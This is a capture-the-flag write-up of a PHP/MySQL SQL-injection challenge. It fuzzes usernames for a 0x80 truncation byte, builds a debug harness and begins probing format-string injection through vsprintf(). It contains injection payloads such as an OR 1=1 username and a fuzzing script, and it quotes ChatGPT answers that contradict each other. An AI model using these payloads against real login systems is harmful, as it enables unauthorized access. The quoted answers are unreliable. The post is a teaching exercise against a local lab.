DownUnderCTF 2023 - Smooth Jazz (SQL Injection)

Posted on

Every year I look forward to DownUnderCTF, a 2-day CTF put on by some of the nicest and brightest folks from around Australia. This was my third year participating, and IMO the crew once again outdid themselves.

I decided this year to do a writeup for Smooth Jazz, another devilishly difficult SQL injection challenge by hashkitten. It involves the threading of three separate needles, and some creative format string wrangling.

Greetz

Shout outs to my fellow TDG team members, to the event organisers and challenge authors, to the generous sponsors, and to hashkitten for taking the time to read an early draft of this post. You’re all legends ❤️

Smooth Jazz

SPOILER WARNING

The challenge repo contains hashkitten’s solution and explanation. Throughout this writeup I propose a few challenges, with optional hints, so that you can progress through the challenge yourself. You should consider avoiding the official solution, and avoid scrolling too quickly through this post, else you could ruin some opportunities to work through the fun parts on your own. You’ve been warned!

The challenge was presented thusly:

Difficulty: medium

Author: hashkitten

Category: web

Sit back, relax, and enjoy this mini SQL injection challenge with some smooth jazz.

Contestants were given a zip file containing some Docker and docker-compose goodies, index.php (the challenge code), and schema.sql (the database setup script)

schema.sql was quite straightforward:

CREATE DATABASE challenge;

USE challenge;

CREATE TABLE IF NOT EXISTS users (
  username TEXT NOT NULL,
  password TEXT NOT NULL
);

INSERT INTO users VALUES ('admin', SHA1(RANDOM_BYTES(32)));

CREATE USER 'challuser'@'%' IDENTIFIED BY 'challpass';
GRANT SELECT ON challenge.* TO 'challuser'@'%';

It creates a table of username and password values, inserts a user with the username “admin” and a password given by the SHA1 of 32 bytes of random data, and creates a low-privilege MySQL user that is able to query the table.

index.php, the heart of the challenge, was given as follows:

<?php
function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

if (isset($_POST['username']) && isset($_POST['password'])) {
  $mysqli = mysqli_connect(getenv('DB_HOST'),
                           'challuser',
                           'challpass',
                           'challenge');
  $username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
  $password = sha1($_POST['password']);

  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "%s"',
                      [$username]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Username not found.";
     goto fail;
  }
  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "'.$username.'" ' .
                          'AND password = "%s"',
                      [$password]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
  }
  $htmlsafe_username = htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin" 
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);
  
  fail:
}
?>

<!--- SNIP - boring HTML --->

There is a chunk of interesting PHP code, followed by a bunch of boring HTML that essentially gives a HTML form and emits $message as set by the PHP code.

Preparing the battlespace

Something I really dig about DownUnderCTF is that the challenge handouts almost always give you everything you need to run the challenge locally. Even if it’s one of those painful challenges where you have a webapp and a database and a headless robot clicking on all the links you send it in the hopes of triggering XSS, they give you a docker-compose.yml. With a simple docker-compose up, you too can have the whole show running on your local machine and can share in the pain of the infra team.

This is great for performance and inspectability while solving the challenges. You get to watch the backend errors whizz past in your terminal, you can attach a debugger, or you can debug the One True Way by adding a million print("got here") statements throughout the code. You can even modify the code to weaken or remove certain security controls, allowing you to attack the problem one part at a time.

And so if you’d like to follow along with this post I suggest you grab a copy of the challenge and get it spun up locally. If something in this post isn’t clear to you, consider adding in some print statements to the code and going through the steps yourself, letting the ground-truth PHP engine tell you what’s going on rather than trusting me. And if you have the opportunity to run a full challenge stack on your local machine during a future CTF, I suggest you take it, even if a few hours of sending different payloads could save you literally minutes of doing docker-compose up 😉

Input Mutation

The challenge starts off by taking a username and password from the POST parameters, and immediate mutates them:

  $username = strtr($_POST['username'],
                    ['"' => '\\"', '\\' => '\\\\']);
  $password = sha1($_POST['password']);

It uses strtr() to modify the username, placing a backslash before any double quote (") or backslash (\) character. By performing both of these modifications with one single call to strtr(), the challenge does a very good job of essentially killing our double quotes and backslashes, turning a double quote (") into an escaped double quote (\") and a backslash (\) into an escaped backslash (\\).

Examples:

aaabbb    -->  aaabbb
aaa"bbb   -->  aaa\"bbb
aaa\bbb   -->  aaa\\bbb

aaa\"bbb  -->  aaa\\\"bbb
                  │ │ 
                  │ └──── Escaped doublequote
                  └──── Escaped backslash

As for our password, it’s hashed using SHA1.

Importantly, we can note that the $_* arrays ($_GET, $_POST, $_REQUEST, and so on) are not used anywhere in the challenge aside from these lines.

And so we can know:

  • These are likely the only inputs we can give to the code (a quick read of it confirms this to be true); and
  • The only way our inputs are getting to the code is by going through this mutation process.

It should be noted, both strtr() and sha1() get really cranky when given arrays, meaning that tricks such as username[]=foo&username[]=bar probably won’t be of any use to us. This can be confirmed in a php -a shell, and trying to do so in a HTTP context will result (in this case) in a 500 Internal Server Error.

% sudo -g docker docker run --rm -ti php:8.1 -a
Interactive shell

php > # strtr() and sha1() are OK with string arguments

php > print_r(strtr("Hello, world!", "", ""));
Hello, world!

php > print_r(sha1("Hello, world!"));
943a702d06f34599aee1f8da8ef9f7296031d699

php > # neither are OK with array arguments

php > print_r(strtr(array("Hello", "world!"), "", ""));
Warning: Uncaught TypeError: strtr(): Argument #1 ($string) must be of type
string, array given in php shell code:1
Stack trace:
#0 php shell code(1): strtr(Array, '', '')
#1 {main}
  thrown in php shell code on line 1

php > print_r(sha1(array("Hello", "world!")));

Warning: Uncaught TypeError: sha1(): Argument #1 ($string) must be of type
string, array given in php shell code:1
Stack trace:
#0 php shell code(1): sha1(Array)
#1 {main}
  thrown in php shell code on line 1

Ruling out things like this early on can be helpful. It can narrow the options you need to consider as you move through the challenge. However, there’s a very fine line here. Prematurely ruling something out that could be made to work with a bit of effort might end up ruling you out of finding the solution!

The first SQL query

Our freshly mutated username is now on its way into a MySQL SQL query:

function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

// [... SNIP ...]

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "%s"',
                    [$username]);
if (!mysqli_fetch_assoc($res)) {
    $message = "Username not found.";
    goto fail;
}

There are a few things going on here.

First of all, there is a utility function being defined (mysql_fquery()) that performs an SQL query after preparing the query (the wrong way) using vsprintf().

I really laboured the point last year that the only way to safely do an SQL query using dynamic data is to use query parameterization (OWASP guidance). I’ll try to not be so preachy this year.

Secondly, there is a use of this utility function to do SELECT * FROM users WHERE username = "%s" where vsprintf() will do the hard work of transforming %s into our mutated $username value. If this SQL query results in no rows being returned, an error message of “Username not found” is set, and we take the goto fail shortcut to the part where the dynamic PHP code ends and the boring HTML starts.

We’ll come back to vsprintf(), how it works, and how we’ll eventually need to make it not work. It’s not relevant for this part of the challenge. For now, it suffices to say that given a $username of “Hello, world!”, the SQL query that will be performed is:

SELECT *
FROM users
WHERE username = "Hello, world!"
--                \__________/
--                 └──── Interpolated by vsprintf()

Reviewing the MySQL database setup script, we can know that the only user has a username of “admin”:

CREATE TABLE IF NOT EXISTS users (
  username TEXT NOT NULL,
  password TEXT NOT NULL
);

INSERT INTO users VALUES ('admin', SHA1(RANDOM_BYTES(32)));

And so we can get past this first hurdle by POSTing a username of “admin”.

Giving a username of “not admin” gives us an error message of “Username not found”:

POST / HTTP/1.1
[... SNIP ...]

username=not+admin&password=
HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Username not found.
[... SNIP ...]

While a username of “admin” gives us an error message of “Invalid password”:

POST / HTTP/1.1
[... SNIP ...]

username=admin&password=
HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Invalid password.
[... SNIP ...]

The problem here is, if we need to give a username of “admin” to get past this username check, and the password input that we give is going to be hashed, we’re very restricted. We’re greatly limited in the inputs we can give and the flexibility with which we can control the logic of the challenge.

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is an opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you gain some flexibility with our inputs? Something that frees us from the shackles of having to give the exact username of “admin” to get past the username check?

Hints (Hover to reveal):

  • Is there any way you can add some data before or after the “admin” string while still getting past the username check?
  • What about if you put some magic or special character after the string “admin”. Something that might cause the SQL query to ignore everything after it within the username string. You could then have whatever you want after this magic or special character, it’d get ignored by MySQL, and you could put all sorts of goodies there, right?
  • Can you think of a way to automate the hunt for this magic or special character? Some kind of fuzzing or brute force strategy?
  • What if you use a fuzzing tool like Burp Intruder. Have it send a username that starts with “admin”, then fuzz the next character, then have some junk like “foobar” right after. See if any of the fuzzed characters mysteriously causes the challenge to say “Invalid password” rather than “Username not found”, indicating we’ve gotten past the username check but with an extra little bit of text smuggled into the username. Good luck!

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

Gaining some username flexibility

Playing around at this point led us to the first primitive that showed some promise, and ended up being vital to solving the challenge. We threw the following POST payload into Burp Intruder, and we set it to cycle the part labelled §xx§ through every hex value from 00 to FF.

POST / HTTP/1.1
[... SNIP ...]

username=admin%§xx§foobar&password=

In doing this, we found there to be many values that mysteriously gave us the “Invalid password” error message rather than the “Username not found” one.

This work can be recreated in Python as follows:

#!/usr/bin/env python3
import requests

s = requests.session()
interesting = []

for c in range(256):
    r = s.post("http://172.31.0.3/",
               data={
                 "username": b"admin" + bytes([c]) + b"foobar",
                 "password": ""
               })
    if "Invalid password" in r.text:
        interesting.append(c)

print([hex(c) for c in interesting])
% ./fuzz.py
['0x80', '0x81', '0x82', '0x83', '0x84', '0x85', '0x86', '0x87', '0x88',
'0x89', '0x8a', '0x8b', '0x8c', '0x8d', '0x8e', '0x8f', '0x90', '0x91',
'0x92', '0x93', '0x94', '0x95', '0x96', '0x97', '0x98', '0x99', '0x9a',
'0x9b', '0x9c', '0x9d', '0x9e', '0x9f', '0xa0', '0xa1', '0xa2', '0xa3',
'0xa4', '0xa5', '0xa6', '0xa7', '0xa8', '0xa9', '0xaa', '0xab', '0xac',
'0xad', '0xae', '0xaf', '0xb0', '0xb1', '0xb2', '0xb3', '0xb4', '0xb5',
'0xb6', '0xb7', '0xb8', '0xb9', '0xba', '0xbb', '0xbc', '0xbd', '0xbe',
'0xbf', '0xc0', '0xc1', '0xc2', '0xc3', '0xc4', '0xc5', '0xc6', '0xc7',
'0xc8', '0xc9', '0xca', '0xcb', '0xcc', '0xcd', '0xce', '0xcf', '0xd0',
'0xd1', '0xd2', '0xd3', '0xd4', '0xd5', '0xd6', '0xd7', '0xd8', '0xd9',
'0xda', '0xdb', '0xdc', '0xdd', '0xde', '0xdf', '0xe0', '0xe1', '0xe2',
'0xe3', '0xe4', '0xe5', '0xe6', '0xe7', '0xe8', '0xe9', '0xea', '0xeb',
'0xec', '0xed', '0xee', '0xef', '0xf0', '0xf1', '0xf2', '0xf3', '0xf4',
'0xf5', '0xf6', '0xf7', '0xf8', '0xf9', '0xfa', '0xfb', '0xfc', '0xfd',
'0xfe', '0xff']

At a glance, it looks like any character above and including \x80 triggers this behaviour. We can confirm this by adding the following to the end of our Python script:

print(all(c in interesting for c in range(0x80, 256)))

When we re-run the script:

% ./fuzz.py
[... SNIP ...]
True

We get confirmation that yes, it’s any character above and including \x80 that does the trick.

Really? MySQL truncates a string value given a byte value above 0x7F?

Yeah. And we’re not quite sure why.

First of all, we assume that MySQL seeks to understand string values as being UTF-8 encoded Unicode strings. A byte outside of the ASCII range (0x00-0x7F) is very liable to constitute an invalid UTF-8 sequence.

Regarding this, ChatGPT says:

Justin: I have a string as follows: `aaaa\x80bbbb`

The A's and B's are all ASCII characters (i.e. <= 0x7F)

Is it true that the presence of the `\x80` byte will always cause
there to be a UTF-8 error? Why?

ChatGPT: Yes, it's true. The `\x80` byte is outside of the ASCII range
(0x00-0x7F), and in UTF-8 it's a continuation byte. If it's not
following a valid start byte, it results in an invalid encoding error.

Justin: What do you mean a "valid start byte"?

ChatGPT: In UTF-8 encoding, a "valid start byte" refers to the first
byte in a multibyte character. Its value indicates the total number
of bytes that form the character. The `\x80` byte isn't a valid start
byte because its binary representation (10000000) does not fit UTF-8's
patterns for start bytes.

Justin: Could a byte <= 0x7F be a valid start byte?

ChatGPT: Yes, a byte <= 0x7F can be a valid start byte. These bytes
correspond to standard ASCII and are valid single-byte UTF-8 characters.

Justin: can you give an example of a sequence of characters containing
the value `\x80` preceded by a byte that is <= 0x7f which represents a
valid UTF-8 string?

ChatGPT: No, I can't. In valid UTF-8, a byte in the range \x80-\xBF must
always be a continuation byte, following a start byte that introduces a
multi-byte sequence. Since the bytes in the range 0x00-0x7F are not
valid start bytes for multi-byte sequences, a byte <= 0x7F cannot be
followed by `\x80`, forming a valid UTF-8 string.

Justin: But you said "Yes, a byte <= 0x7F can be a valid start byte"

ChatGPT: I apologize for any confusion. While it's true a byte <= 0x7F can
be a valid start byte, it's more accurate to say that these bytes are
single-byte UTF-8 characters. A multibyte UTF-8 character always starts
with a byte in the range 0xC2-0xF4, not 0x00-0x7F. Therefore, \x80 cannot
follow a byte <= 0x7F in valid UTF-8 encoding.

And so if ChatGPT can be trusted, using a value between and including \x80 and \xBF is a good choice for our spicy truncation byte. Per the UTF-8 spec, it is apparently always expected to be preceded by a start byte that introduces a multi-byte sequence, which the “n” in “admin” (and indeed all other ASCII characters) cannot be. We’ll stick with \x80.

If MySQL is trying to take our string as a UTF-8 encoded Unicode string, then it would be choking on this spicy byte.

But then why is it ignoring all subsequent characters within the quoted string value?

I… Don’t know. I spoke to hashkitten about it, and we wondered if it might have something to do with how MySQL used to truncate strings on insertion if they contained an invalid UTF-8 sequence - see for example this thread on the orange website and this hilarious post to the MySQL bug tracker. But apparently this default silent truncation behaviour went away when MySQL started defaulting to strict sql_mode with version 5.7, released in 2013.

I turned on the query logs for my MySQL container and confirmed that the queries are being logged in their full glory, with the \x80 spicy byte and the trailing “foobar” data. But a few cheeky queries against the database from the command line fail to exhibit the truncation behaviour:

% sudo -g docker docker run --rm -it --entrypoint=mysql mysql -h 172.31.0.2 \
    --password=dummy --execute=$'SELECT \'aaaa\x80bbbb\''
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------+
| aaaa�bbbb |
+-------------+
| aaaa�bbbb |
+-------------+

% sudo -g docker docker run --rm -it --entrypoint=mysql mysql -h 172.31.0.2 \
    --password=dummy --execute=$'SELECT 1337 WHERE \'aaaa\' = \'aaaa\''
mysql: [Warning] Using a password on the command line interface can be insecure.
+------+
| 1337 |
+------+
| 1337 |
+------+

% sudo -g docker docker run --rm -it --entrypoint=mysql mysql -h 172.31.0.2 \
    --password=dummy --execute=$'SELECT 1337 WHERE \'aaaa\' = \'aaaa\x80bbbb\''
mysql: [Warning] Using a password on the command line interface can be insecure.

And so like… Is this only an issue when querying from PHP somehow? I don’t know.

I don’t like leaving mysteries like this unexplained, but I also don’t have the patience right now to get to the bottom of what’s going on. And so let’s not look a gift horse in the mouth, and let’s take the primitive for what it is.

The second SQL query

We can get past the username check by giving the username “admin”. We can even follow it up with a character above or equal to 0x80 and then as much extra junk as we want.

The second hurdle we face is as follows:

function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

// [... SNIP ...]
$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username."' " .
                        'AND password = "%s"',
                    [$password]);
if (!mysqli_fetch_assoc($res)) {
    $message = "Invalid password.";
    goto fail;
}

i.e. We now have a password check.

This code does the following:

  1. Uses string concatenation to directly inject the mutated $username (with its double slashes and backslashes having been escaped) into the query SELECT * FROM users WHERE username = "$username" AND password = "%s"
  2. Uses vsprintf() to replace the %s token in the query with the SHA1 of the password given by us
  3. Queries the database, and if it returns no data, takes the goto fail shortcut to sadness

Breaking the code down a bit and skipping straight to the username/password check, tracing it through gives the following journey for a username of “admin” and a password of “password”:

// [... SNIP ...]

// $_POST['username'] = "admin"
// $_POST['password'] = "password"

$username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
$password = sha1($_POST['password']);

// $username = "admin"      (no change)
// $password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

// [... SNIP - username SQL query omitted...]

$query = 'SELECT * FROM users WHERE username = "'.$username.'" ' .
    'AND password = "%s"';

// After the direct injection of the username, we have:
// $query = 'SELECT * FROM users WHERE username = "admin" AND password = "%s"'

$res = mysql_fquery($mysqli, $query, [$password]);

// $query and its friend $password are sent into the
// mysql_fquery() utility function

function mysql_fquery($mysqli, $query, $params) {
    $query_prepared = vsprintf($query, $params);
    // i.e. vsprintf('SELECT * FROM users WHERE username = "admin" ' .
    //                   'AND password = "%s"',
    //                array("5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"))

    // $query_prepared = 'SELECT * FROM users WHERE username = "admin" ' .
    //     'AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"'
    return mysqli_query($mysqli, vsprintf($query, $params));
}

// At this point, $res is a mysqli_result
// (https://www.php.net/manual/en/class.mysqli-result.php)
// It's probably empty because the admin's password is probably not 'password'

if (!mysqli_fetch_assoc($res)) {
    // This branch will probably get taken, because
    // the admin's password is probably not 'password'
    $message = "Invalid password.";
    goto fail;
}

// Execution continues if the admin's password is 'password'

Contrast this to what would happen if we gave a traditional SQL injection username of admin\x80" OR 1=1;-- -

// [... SNIP ...]

// $_POST['username'] = 'admin%80" OR 1=1;-- -'
// $_POST['password'] = "password"

$username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
$password = sha1($_POST['password']);

// $username = 'admin\x80\\" OR 1=1;-- -'
// (Note that our double quote in the username has been escaped)
// $password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

// [... SNIP - username SQL query omitted...]

$query = 'SELECT * FROM users WHERE username = "'.$username."' " .
    'AND password = "%s"';

// After the direct injection of the username, we have:
// $query = 'SELECT * FROM users ' .
//  'WHERE username = "admin\x80\\" OR 1=1;-- -" ' .
//  'AND password = "%s"'

$res = mysql_fquery($mysqli, $query, [$password]);

// $query and its friend $password are sent into the
// mysql_fquery() utility function

function mysql_fquery($mysqli, $query, $params) {
    $query_prepared = vsprintf($query, $params);
    // i.e. vsprintf('SELECT * FROM users ' .
    //                   'WHERE username = "admin\x80\\" OR 1=1;-- -" ' .
    //                   'AND password = "%s"',
    //                array("5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"))

    // $query_prepared = 'SELECT * FROM users ' .
    //    'WHERE username = "admin\x80\\" OR 1=1;-- -" ' .
    //    'AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"'
    return mysqli_query($mysqli, vsprintf($query, $params));
}

// At this point, $res is a mysqli_result
// (https://www.php.net/manual/en/class.mysqli-result.php)

if (!mysqli_fetch_assoc($res)) {
    // This branch will get taken if the admin's password is not 'password'
    $message = "Invalid password.";
    goto fail;
}

// Execution continues if the admin's password is 'password'

We end up in the exact same spot. The strtr() has done its job, preventing us from breaking out of the double-quoted username. Thus it seems we cannot do the traditional OR 1=1 trick to bypass the password check.

So what now?

Building a test harness

At this point in a CTF challenge, I like to be able to rapidly try different things and get feedback on what happens at various points throughout the data processing process.

The way that I did this during the CTF was to break apart or wrap certain steps in the original code, and to sprinkle it with debug print statements. This had the effect of essentially dumping some debug logs straight into HTTP responses, and I could sit there with Burp Repeater and try different payloads to learn more about the internal interactions and mechanics of the data processing.

My very heat-of-the-moment CTF-quality modifications were as follows:

function my_vsprintf($a, $b) {
    print_r("vsprintf format string: " . $a . "\n");
    print_r("vsprintf format params: ");
    print_r($b);
    $res = vsprintf($a, $b);
    print_r("res: " . $res . "\n");
    print_r("---\n\n");
    return $res;
}

function mysql_fquery($mysqli, $query, $params) {
  $q = my_vsprintf($query, $params);
  print_r("SQL: " . $q . "\n");
  print_r("---\n\n");
  return mysqli_query($mysqli, $q);
}


if (isset($_POST['username']) && isset($_POST['password'])) {
  $mysqli = mysqli_connect('db', 'challuser', 'challpass', 'challenge');
  $username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
  $password = sha1($_POST['password']);
  print_r("username: " . $username . "\n---\n\n");

  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "%s"',
                      [$username]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Username not found.";
     goto fail;
  }
  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "'.$username.'" ' .
                          'AND password = "%s"',
                      [$password]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
  }

Yes, it’s ugly, in a lot of ways. While I try to keep my working neat and logical while I thrash out a CTF challenge, sometimes when you’re making an omelette you just need to get egg everywhere.

But now, with the benefit of hindsight and the desire to be able to, you know, explain what’s going on, we can take the chance to build our own reproduction of the data processing pipeline as a command-line utility:

<?php
function my_vsprintf($format, $values) {
  // Perform vsprintf() on a given format string and values array
  // Show our work as we go
  print_r("[+] vsprintf()\n");
    print_r("format string: $format\n");
    // Use json_encode() to get the array in one neat line.
    // Tell it to be prepared for the invalid UTF8 sequence.
    print_r("values: " . 
                json_encode($values, JSON_INVALID_UTF8_SUBSTITUTE) .
                "\n");
    $res = vsprintf($format, $values);
    print_r("result: $res\n\n");
    return $res;
}

function mysql_fquery($query, $params) {
    // Construct the SQL query and pretend to execute it
    $prepared_query = my_vsprintf($query, $params);
    print_r("[+] Do SQL Query\n");
    print_r($prepared_query . "\n\n");
    // We don't need to do the query, we're just monitoring the data flow
    //return mysqli_query($mysqli, $q);
}

// Get the username, escape its double quotes and backslashes
$username = $argv[1];
$username = strtr($username, ['"' => '\\"', '\\' => '\\\\']);
print_r("username: $username\n");

// Get the password, SHA1 it
$password = $argv[2];
$password = sha1($password);
print_r("password: $password\n\n");

mysql_fquery('SELECT * FROM users WHERE username = "%s"', [$username]);

// Stop if the username doesn't match our criteria:
//  * 'admi'   == bad
//  * 'admin'  == good
//  * 'adminX' == good if and only if X is a character >= 0x80
if (strpos($username, "admin") !== 0) {
  die("bad username!\n");
}
if (strlen($username) > 5 && ord(substr($username, 5, 1)) < 0x80) {
  die("bad username!\n");
}
mysql_fquery('SELECT * FROM users WHERE username = "'.$username.'" ' .
                 'AND password = "%s"', [$password]);

Note that this harness doesn’t perform the actual SQL queries. It pretends to check the username in a way that the admin\x80foobar trick will bypass, but really what we’re interested in doing is eyeballing the SQL queries that it indicates the challenge code would be executing.

Running this harness validates the accuracy of the analysis and manual traces we’ve done so far. Or perhaps it’s the analysis and manual traces that are validating the accuracy of the harness. That or they’re both equally incorrect…

We take care to run this with PHP 8.1, matching the version used in the challenge:

% sudo -g docker docker run --rm -it \
    -v $(pwd):/pwd --entrypoint=bash php:8.1
root@c97654bed495:/# cd /pwd
root@c97654bed495:/pwd#

The “bad username” case gives:

# php jazz-data-pipeline.php not-admin password
username: not-admin
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["not-admin"]
result: SELECT * FROM users WHERE username = "not-admin"

[+] Do SQL Query
SELECT * FROM users WHERE username = "not-admin"

bad username!

While the “good username” case (username = “admin”) gives:

# php jazz-data-pipeline.php admin password
username: admin
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin"]
result: SELECT * FROM users WHERE username = "admin"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin"

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "admin" AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users WHERE username = "admin"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

And the spicy username case (with the \x80 byte) gives:

# php jazz-data-pipeline.php $'admin\x80its free real estate' password
username: admin🔥its free real estate
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffdits free real estate"]
result: SELECT * FROM users WHERE username = "admin🔥its free real estate"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥its free real estate"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥its free real estate"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users
    WHERE username = "admin🔥its free real estate"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥its free real estate"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

Note: My terminal doesn’t print \x80 in a visible way, so I’ve replaced it with 🔥

Spicy attempt at an SQL injection username case gives:

# php jazz-data-pipeline.php $'admin\x80" OR 1=1;-- -' password
username: admin🔥\" OR 1=1;-- -
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd\\\" OR 1=1;-- -"]
result: SELECT * FROM users WHERE username = "admin🔥\" OR 1=1;-- -"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥\" OR 1=1;-- -"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥\" OR 1=1;-- -"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users
    WHERE username = "admin🔥\" OR 1=1;-- -"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥\" OR 1=1;-- -"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

We can see that indeed the strtr() sanitisation of our string is killing the traditional SQL injection attempt dead in the water:

SELECT * FROM users
WHERE username = "admin🔥\" OR 1=1;-- -"
--                \__________________/
--                  └── This is all treated as a single string 😞
AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

And so it would seem that unless we know the administrator’s password, we cannot progress further.

Recall that the database setup script said:

CREATE TABLE IF NOT EXISTS users (
  username TEXT NOT NULL,
  password TEXT NOT NULL
);

INSERT INTO users VALUES ('admin', SHA1(RANDOM_BYTES(32)));

The admin user’s password is 32 random bytes (256 bits). This means that there are 2256 (over 115 quattuorvigintillion) possible password values for the admin. There is no way we’re guessing it, and even if we could leak the admin’s password hash somehow, there is no way we’re cracking it.

And so there must be some other way of getting past this “username and password” check.

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is another opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you get past this username/password check? Keep in mind that we can use a character above or equal to \x80 to smuggle in some data after the username of “admin”.

Hints (Hover to reveal):

  • How does vsprintf() work?
  • What is the format string that vsprintf() is being called on? Do we have any control over it?
  • It seems like we do control part of the format string! Why? What can we do with it?
  • Is there anything you could bring to the party after the string “admin” that might cause vsprintf() to behave in an interesting way? Read the documentation for vsprintf() for inspiration.
  • The next spoiler is a spicy one, don’t reveal it until you’re ready! You can do this 💪
  • It looks like putting format string conversion specifications such as %s into the username causes vsprintf() to act in a strange way. What does the error mean? And is there any way to get around it? Remember, we can’t control the number of values that are being used as format string parameters. Read the documentation for vsprintf() very carefully.
  • It looks like we can use %1$s to explicitly reference the first parameter in the array of parameters. But %s probably won’t do us any good at achieving, say, injection of a " to break out of the double quoted string. The only item in the array of parameters is a SHA1 hash, which can only contain 0-9 and a-f. Is there some other format string conversion specification that, under the right circumstances, could inject a " into the double quoted username string, giving us SQL injection?

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

vsprintf(), format strings, and format string injections

It’s now time to dig into vsprintf(), format strings, and how the code is using them to do bad SQL query preparation.

vsprintf() is a function that takes a format string and an array of values, and interpolates the values into the format string as instructed by the “conversion specifications” contained within the format string.

The challenge code uses only one type of format string “conversion specification”. This is the %s conversion specification. As an example, when interpolating over a format string that contains %s conversion specifications, each time one is encountered, the next element of the values array is taken and is injected as a string.

For example:

php > print_r(vsprintf("Hello, %s! My name is %s.\n",
                       array("world", "Justin")));
Hello, world! My name is Justin.

The first %s in Hello, %s! took the first element in the values array, world. And the second %s took the Justin.

Now, what’s crucial about the challenge’s password check is that it does the following:

function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username.'" '.
                    'AND password = "%s"', [$password]);

That is, it first uses string concatenation to directly inject $username into the query, and then it uses vsprintf() to interpolate $password in using the %s conversion specification. This means that we can use $username to bring our own format string conversion specifications to the party, achieving format string injection.

A naive attempt at this goes a bit wonky:

# php jazz-data-pipeline.php $'admin\x80 %s' password
username: admin🔥 %s
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd %s"]
result: SELECT * FROM users WHERE username = "admin🔥 %s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin %s"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥 %s"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]

Fatal error: Uncaught ValueError: The arguments array must contain
2 items, 1 given in /pwd/jazz-data-pipeline.php:9
Stack trace:
#0 /pwd/jazz-data-pipeline.php(9): vsprintf('SELECT * FROM u...', Array)
#1 /pwd/jazz-data-pipeline.php(16): my_vsprintf('SELECT * FROM u...', Array)
#2 /pwd/jazz-data-pipeline.php(45): mysql_fquery('SELECT * FROM u...', Array)
